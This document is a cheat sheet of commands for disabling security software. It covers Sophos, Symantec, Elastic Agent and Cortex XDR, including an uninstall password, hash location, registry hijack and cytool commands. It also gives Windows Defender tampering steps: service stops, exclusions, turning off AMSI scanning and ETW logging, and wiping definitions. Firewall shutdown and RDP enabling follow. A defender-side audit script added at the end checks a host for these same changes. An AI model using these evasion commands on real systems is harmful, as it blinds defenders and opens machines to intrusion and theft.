# Disabling antivirus software

**Sophos**

```
https://github.com/ayeskatalas/Sophos-Removal-Tool/
```

**Symantec**

```
https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html
```

**Elastic EDR**

```
https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
cd "C:\Program Files\Elastic\Agent\"
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
Elastic Agent has been uninstalled.
```

**Cortex XDR**

```
https://mrd0x.com/cortex-xdr-analysis-and-bypass/
Uninstall password: Password1
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.

Disable Cortex: point the service DLL at a random value, then reboot
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f

Disable at startup; takes effect after a reboot
cytool.exe startup disable

Disable protection of Cortex XDR files, processes, registry keys and services
cytool.exe protect disable

Disable Cortex XDR (even when tamper protection is enabled)
cytool.exe runtime disable

Disable event collection
cytool.exe event_collection disable
```

**Disable Windows Defender**

```
Disable Defender
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring $true

Exclude processes / locations
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
Add-MpPreference -ExclusionPath C:\Video, C:\install

Disable scanning of all downloaded files and attachments, disable AMSI
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
Disable AMSI (set the value to 0 to turn it back on)
PS C:\> Set-MpPreference -DisableScriptScanning 1

Zero the registry value of the Defender ETW session
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

Wipe the currently stored definitions
MpCmdRun.exe location: C:\ProgramData\Microsoft\Windows Defender\Platform\
MpCmdRun.exe -RemoveDefinitions -All

Remove signatures
PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Disable Windows Defender Security Center
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

Disable real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
```

**Firewall**

```
Allow inbound
If Remote Desktop Services has never been configured on the system, a firewall rule allowing port 3389 must also be added the first time it is enabled:
>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>netsh firewall set portopening TCP 3389 ENABLE
Turn off the firewall
>netsh firewall set opmode mode=disable
Show the current status
>netsh advfirewall show allprofiles
Turn off all profiles
>netsh advfirewall set allprofiles state off
>sc stop windefend
>sc delete windefend
PS> Set-MpPreference -DisableRealtimeMonitoring 1
PS> Set-MpPreference -DisableArchiveScanning $true
IP whitelist
PS> New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress 10.10.10.10
List the firewall rules that block ports (Action 0 = block)
PS> $f = New-Object -ComObject HNetCfg.FwPolicy2; $f.Rules | Where-Object { $_.Action -eq 0 } | Select-Object Name, ApplicationName, LocalPorts
Disable the firewall
On Windows 7 via cmd (note: this sets fDenyTSConnections to 0, which allows Remote Desktop connections; it does not change the firewall itself)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

On Windows 7 via PowerShell (the same registry change; the command string must be double-quoted so PowerShell executes it rather than echoing a string literal)
powershell.exe -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0"

On any Windows version via cmd
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
```
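As an added defender-side check that is not part of the original page, the following PowerShell audit reports whether any of the Defender, Cortex/CryptSvc, firewall and Remote Desktop changes listed in the Windows Defender and Firewall sections above are present on a host. It assumes a Windows host with the Defender and NetSecurity modules available and an elevated session; the function names `Get-RegValue` and `Invoke-AvTamperAudit` are my own.

```powershell
# Added audit script, not from the original page. Function names are my own.
# Assumes Windows with the Defender and NetSecurity modules, run as Administrator.
function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Invoke-AvTamperAudit {
    $findings = New-Object System.Collections.Generic.List[string]
    # Defender service start type (sc config ... disabled / sc delete)
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    if (-not $svc) { $findings.Add('WinDefend service is missing') }
    elseif ($svc.StartType -eq 'Disabled') { $findings.Add('WinDefend start type is Disabled') }
    # Preferences and exclusions set with Set-MpPreference / Add-MpPreference
    $pref = Get-MpPreference -ErrorAction SilentlyContinue
    if ($pref) {
        foreach ($p in 'DisableRealtimeMonitoring','DisableIOAVProtection','DisableScriptScanning','DisableArchiveScanning') {
            if ($pref.$p) { $findings.Add("Defender preference $p is set") }
        }
        if ($pref.ExclusionPath)    { $findings.Add("Exclusion paths: $($pref.ExclusionPath -join ', ')") }
        if ($pref.ExclusionProcess) { $findings.Add("Exclusion processes: $($pref.ExclusionProcess -join ', ')") }
    } else { $findings.Add('Get-MpPreference failed (module unavailable or engine stopped)') }

    # Policy keys, the DefenderApiLogger ETW session and the Security Center service
    $pol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    foreach ($v in 'DisableAntiSpyware','DisableAntiVirus') {
        if ((Get-RegValue $pol $v) -eq 1) { $findings.Add("Policy $v = 1") }
    }
    if ((Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger' 'Start') -eq 0) {
        $findings.Add('DefenderApiLogger autologger is off (Start = 0)')
    }
    if ((Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\SecurityHealthService' 'Start') -eq 4) {
        $findings.Add('SecurityHealthService is disabled (Start = 4)')
    }

    # Cortex-style ServiceDll swap on CryptSvc: the value should still name cryptsvc.dll
    $dll = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters' 'ServiceDll'
    if ($dll -and $dll -notmatch 'cryptsvc\.dll$') { $findings.Add("CryptSvc ServiceDll is '$dll'") }
    # Firewall profiles switched off with netsh, and RDP allowed via fDenyTSConnections
    Get-NetFirewallProfile -ErrorAction SilentlyContinue | Where-Object { $_.Enabled -eq 'False' } |
        ForEach-Object { $findings.Add("Firewall profile $($_.Name) is disabled") }
    if ((Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections') -eq 0) {
        $findings.Add('Remote Desktop connections are allowed (fDenyTSConnections = 0)')
    }
    return $findings
}

Invoke-AvTamperAudit | ForEach-Object { "[!] $_" }
```

An empty result means none of the listed indicators were found; each finding maps back to one of the commands in the sections above, so it tells you which change to revert or investigate.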
